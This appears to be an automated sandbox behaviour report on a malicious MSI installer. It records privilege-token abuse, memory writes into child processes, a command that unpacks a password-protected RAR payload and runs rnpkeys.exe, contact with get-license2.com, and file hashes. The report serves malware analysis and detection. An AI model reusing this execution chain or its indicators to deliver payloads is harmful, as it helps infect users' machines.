File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Installer\f77273f.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI280A.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI2BA5.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI40DC.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI5547.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f772742.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f77273f.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI2A5D.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f772742.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI2991.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI4020.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f772744.msi C:\Windows\system32\msiexec.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Installer Packages

persistence privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1892 wrote to memory of 2216 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1892 wrote to memory of 2216 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1892 wrote to memory of 2216 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1892 wrote to memory of 2216 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1892 wrote to memory of 2216 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1892 wrote to memory of 2216 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1892 wrote to memory of 2216 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1892 wrote to memory of 1220 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\UnRAR.exe
PID 1892 wrote to memory of 1220 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\UnRAR.exe
PID 1892 wrote to memory of 1220 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\UnRAR.exe
PID 1892 wrote to memory of 2184 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe
PID 1892 wrote to memory of 2184 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe
PID 1892 wrote to memory of 2184 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe

Processes

C:\Windows\system32\msiexec.exe

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding C1A7CF0327C2292751D0495381E118D9

C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\UnRAR.exe

"C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\UnRAR.exe" x -p2161183588a "C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\nijboq.rar" "C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\"

C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe

"C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 get-license2.com udp
US 104.21.17.66:443 get-license2.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 216.58.201.99:80 c.pki.goog tcp

Files

C:\Windows\Installer\MSI280A.tmp

MD5 b158d8d605571ea47a238df5ab43dfaa
SHA1 bb91ae1f2f7142b9099e3cc285f4f5b84de568e4
SHA256 ca763693cc25d316f14a9ebad80ebf00590329550c45adb7e5205486533c2504
SHA512 56aef59c198acf2fcd0d95ea6e32ce1c706e5098a0800feff13ddb427bfb4d538de1c415a5cb5496b09a5825155e3abb1c13c8c37dc31549604bd4d63cb70591

C:\Windows\Installer\MSI2A5D.tmp

MD5 1a2b237796742c26b11a008d0b175e29
SHA1 cfd5affcfb3b6fd407e58dfc7187fad4f186ea18
SHA256 81e0df47bcb2b3380fb0fb58b0d673be4ef1b0367fd2b0d80ab8ee292fc8f730
SHA512 3135d866bf91f9e09b980dd649582072df1f53eabe4c5ac5d34fff1aeb5b6fa01d38d87fc31de19a0887a910e95309bcf0e7ae54e6e8ed2469feb64da4a4f9e5

C:\Windows\Installer\MSI40DC.tmp

MD5 54d74546c6afe67b3d118c3c477c159a
SHA1 957f08beb7e27e657cd83d8ee50388b887935fae
SHA256 f9956417af079e428631a6c921b79716d960c3b4917c6b7d17ff3cb945f18611
SHA512 d27750b913cc2b7388e9948f42385d0b4124e48335ae7fc0bc6971f4f807dbc9af63fe88675bc440eb42b9a92551bf2d77130b1633ddda90866616b583ae924f

\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\java.exe

MD5 81ef95c9d6fb0fd339f6b254c81f934b
SHA1 46b69c1ad6591a187e4a0fb505586b1dd7a0b4c6
SHA256 b8068815d4aa20f0f838fe081d7cb78379b5e82723f78cc1213232ed67226417
SHA512 818b3548af0b13f44f6807f6ff6ed268e4b8bd9ad92aeae6698cf623c094319a68cbb9f046918ea4f185e1ebb6bd015285c7f3b23e5620f877ea13db8b7ceaf1

C:\Config.Msi\f772743.rbs

MD5 c4d7019235e326e9771fb4174024d1dd
SHA1 bf5132f7e64bf51edcd6f9629e37896a481b9694
SHA256 9c8146c2a70786bcbe66b71930d152a27b8a6627f7ea7f49b8aba5ac3daa4d93
SHA512 d1b2349e71e73b7c089dd9ef8f8c683f9f02108411dd34f3754943e4d94bb90628af8bf1fd598e5622c01de49184bfffc268db5ac32688f63ce893a6b795b930

C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\UnRAR.exe

MD5 98ccd44353f7bc5bad1bc6ba9ae0cd68
SHA1 76a4e5bf8d298800c886d29f85ee629e7726052d
SHA256 e51021f6cb20efbd2169f2a2da10ce1abca58b4f5f30fbf4bae931e4ecaac99b
SHA512 d6e8146a1055a59cba5e2aaf47f6cb184acdbe28e42ec3daebf1961a91cec5904554d9d433ebf943dd3639c239ef11560fa49f00e1cff02e11cd8d3506c4125f

C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\nijboq.rar

MD5 63efe86838e7196cedd93d7c10ac40e6
SHA1 61dcc0ce49355f1f44a7c2ee97ace10feece2e03
SHA256 9e7f5695c50bde002223c72084b44d8d22ab12c3ad2ce993e1f08ae90c6d6172
SHA512 7773e45af4c85b35aa9afb347fab3723eef9469cd4ed45fda89e058167a57b66b106ef8cce7fdc90701dd13279a8ab61e45f7f4c7df8fd084e6513f362483dac

\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe

MD5 ae63517a3ce7949a2c084cd7541c2fd8
SHA1 8dafa610a0c3aa6ee2e50f657c90757bfae80336
SHA256 14b6f5c640c73cdd99e5834e7a56ab3d2912abe623bf5e41946154dad69e5f26
SHA512 fd5a85d902b376226d14bafe7c9ad9aabfc5245c61e2c3c17d12227dccbd9aee3b21e59a9357349dabcdc5ecafda9fc2ab737e8f06d7b7490931648021b3c1f3

C:\Windows\Installer\f77273f.msi

MD5 6e619d3d24f58bfb7bd7e76a4756e258
SHA1 890359e1e86525c4c14e975e762239878134b32d
SHA256 5b3a41ed8a9a619b4aa18cef611c94b3273671ad464847cbfa600a6571c64431
SHA512 1a1f432c3c8ed5c627b2724b1fc5600ba31859838445b67d137c29439345e48bebe16074c3d9f909958af31670764422b379d7ced52c13feca7468e25a10162e

C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnp.dll

MD5 1825d0310bf5029899f42004c4a1ef83
SHA1 ac79aab26730982838f5af5eadfa1e48f4625947
SHA256 1c45bf1b4b0dbbf3eec7fbe8d08640c8df98a9679c9753a295a5d2e29d8b6a58
SHA512 7c7c433b74c9b247401af4b72563256bfef055a8f5e65071ddcffe727502445be7760b64a1e7844e69c625dda899b928500dcb2c144defcc1ccf2ed206632145